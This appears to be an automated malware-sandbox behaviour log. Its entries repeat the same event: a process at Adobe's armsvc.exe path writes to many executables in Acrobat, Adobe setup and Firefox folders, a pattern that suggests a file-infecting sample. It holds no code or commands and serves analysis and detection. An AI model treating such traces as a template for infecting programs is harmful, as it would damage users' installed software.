                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
